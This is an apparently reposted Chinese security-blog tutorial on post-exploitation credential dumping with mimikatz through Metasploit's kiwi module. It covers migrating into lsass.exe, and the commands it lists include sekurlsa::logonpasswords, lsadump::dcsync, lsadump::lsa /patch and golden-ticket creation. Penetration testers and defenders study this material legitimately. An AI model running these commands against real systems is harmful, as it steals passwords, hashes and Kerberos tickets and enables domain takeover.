msf中的mimikatz

admin 2024年12月18日22:23:43评论26 views字数 2068阅读6分53秒阅读模式
msf中的mimikatz

背景

msf中的mimikatz

Mimikatz和msf是我们平时在渗透过程中用到的一款优秀的后渗透工具,今天来回顾一下在MSF中的mimikatz的用法。本文只针对技术利用方法,原理请回顾之前的文章。

Load Mimikatz

msf中的mimikatz
msf中的mimikatz

当我们在正常的渗透流程中通过meterpreter获取到一个shell后,我们首先需要确认我们处于system权限,才能正常使用mimikatz的功能

msf中的mimikatz

Mimikatzz是支持x86和x64的windows架构,再确认获取system权限后,通过sysinfo命令确认目标机器的基本信息,特别是分清楚32位还是64位,以及是否在域环境中,等等。

msf中的mimikatz

现在msf6上的mimikatz模块已经合并为kiwi模块,该模块的使用必须是system权限。

msf中的mimikatz

Kiwi模块是同时支持32位和64位系统的,但是默认情况下加载的是32位的,如上图所示,我们通过load mimikatz载入时,这里有基本的软件版本信息,包括一条警示,x86架构的软件运行在x64上,直接默认加载该模块会导致很多功能是无法正常使用的。这时候我们可以查看系统进程列表,将meterpreter进程迁移到一个64位程序的进程当中。

msf中的mimikatz

我们可以看到有很多的进程,这时候我们不妨直接选择lsass.exe迁移进去,在这里lsass的PID为512,我们利用migrate指令执行

msf中的mimikatz

msf中的mimikatz

可以看到,重新导入后就没有警示了,接着我们看一下基本的功能

msf中的mimikatz

看不懂没关系,有谷歌翻译,有道翻译,实在不懂就挨个执行一下,加深印象。翻译如下:

  • creds_all:             #列举所有凭据

  • creds_kerberos:        #列举所有kerberos凭据

  • creds_msv:             #列举所有msv凭据

  • creds_ssp:             #列举所有ssp凭据

  • creds_tspkg:           #列举所有tspkg凭据

  • creds_wdigest:         #列举所有wdigest凭据(明文)

  • dcsync:               #通过DCSync检索用户帐户信息

  • dcsync_ntlm:           #通过DCSync检索用户帐户NTLM散列、SID和RID

  • golden_ticket_create:  #创建金票

  • kerberos_ticket_list:  #列举kerberos票据

  • kerberos_ticket_purge:#清除kerberos票据

  • kerberos_ticket_use:   #使用kerberos票据

  • kiwi_cmd:              #执行mimikatz的命令,后面接mimikatz.exe的命令

  • lsa_dump_sam:          #dump出lsa的SAM

  • lsa_dump_secrets:      #dump出lsa的密文

  • password_change:       #修改密码

  • wifi_list:             #列出当前用户的wifi配置文件

  • wifi_list_shared:      #列出共享wifi配置文件/编码

(1)    creds_all:如图,列举系统中的明文密码(显示明文与否与系统版本相关)

msf中的mimikatz

msf中的mimikatz

(2)    kiwi_cmd:这里是利用mimikatz的全部功能,后面是平时我们单独使用mimikatz的指令。

msf中的mimikatz

msf中的mimikatz

(3)    kiwi_cmdsekurlsa::logonpasswords

再列举几个mimikatz常用模块:

msf中的mimikatz
msf中的mimikatz

sekurlsa:

msf中的mimikatz

①sekurlsa::logonpasswords:抓取用户NTLM哈希

②sekurlsa::msv:提取ntlm hash凭证

③sekurlsa::minidumplsass.dmp

Sekurlsa::logonpasswords full:加载dmp文件,并导出明文密码

④sekurlsa::tickets /export导出lsass.exe进程中所有票据

msf中的mimikatz

msf中的mimikatz

msf中的mimikatz

Kerberos模块

msf中的mimikatz

①kerberos::list

Kerberos::tgt:列出系统中的票据

②kerberos::purge:清除系统中的票据

③kerberos::ptc [ticket-path]:导入票据到系统中

msf中的mimikatz
msf中的mimikatz

Lsadump模块

msf中的mimikatz

①lsadump::dcsync /domain:[domainname.com] /user:[username]:域控机器上执行,可查看指定域内的指定用户的详细信息。

②lsadump::lsa /patch:域控机器上执行,读取所有域用户的hash

③lsadump::sam /sam:sam.hive /system:system.hive:从sam和system文件中获得NTLMHash

④token::elevate

Lsadump::sam从本地SAM文件中读取密码Hash

msf中的mimikatz

msf中的mimikatz

msf中的mimikatz

后记

msf中的mimikatz

本文只是简单地回顾和分享了一下msf中的mimikatz的用法,更详细的实战用法将会在后面的文章中做分享。

msf中的mimikatz

原文始发于微信公众号(江离安全团队):msf中的mimikatz

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月18日22:23:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   msf中的mimikatzhttps://cn-sec.com/archives/1048422.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息